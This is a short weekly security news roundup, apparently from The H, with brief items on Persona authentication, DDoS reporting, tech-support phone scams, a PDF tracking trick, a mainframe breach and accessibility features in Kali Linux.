Lost+Found: accessible pentesting and non-web Persona

Too small for news, but too good to lose, Lost+Found is a compilation of the other stories that have been on The H's radar over the last seven days: non-web Persona use proposed, how to report a DDoS, laptops filled with porn, tracking ships, counting fake callers, PDF receipts, mainframe intrusion, and accessible pentesting...

• Members of the IETF's Network Working Group are currently discussing a draft proposal to make Mozilla's Persona decentralised authentication protocol (aka BrowserID) accessible to locally installed business applications via common interfaces (SASL and GSS-API). At present, Persona can only be used for authentication in web applications.

• ICANN explains how to report a DDoS attack. Very accessible self-help advice.

• If a Chinese national carries a NASA computer, this person must be a spy and the computer must be full of government secrets – or porn.

• Feeling bored? How about tracking ship movements?

• Fake calls from alleged members of Microsoft's tech support are a nuisance. Some time ago, the Internet Storm Center created a form for targeted users in order to find out more about the callers. The current statistical summary: 93% of the phone scammers have an accent, and a total of 82% are male. Only 15% tried to solicit credit card details, but every second caller wanted to use remote management software to establish a connection to the potential victim's computer.

• McAfee reports that a PDF file can use the JavaScript API to call a non-existent URL and send a kind of secret receipt confirmation when it is opened.

• If you think that mainframe computers are as good as bulletproof, read on: on over 500 pages, Logica has documented a successful intrusion into at least two partitions of an IGM mainframe running z/OS via the internet. The attackers say that they harvested parts of the SPAR Swedish Population and Address Register, as well as customer information including credit card details.

• Exemplary: the current version of BackTrack successor Kali Linux offers a speech engine that makes the hacker's Swiss Army knife accessible to visually impaired pentesters.

(sno)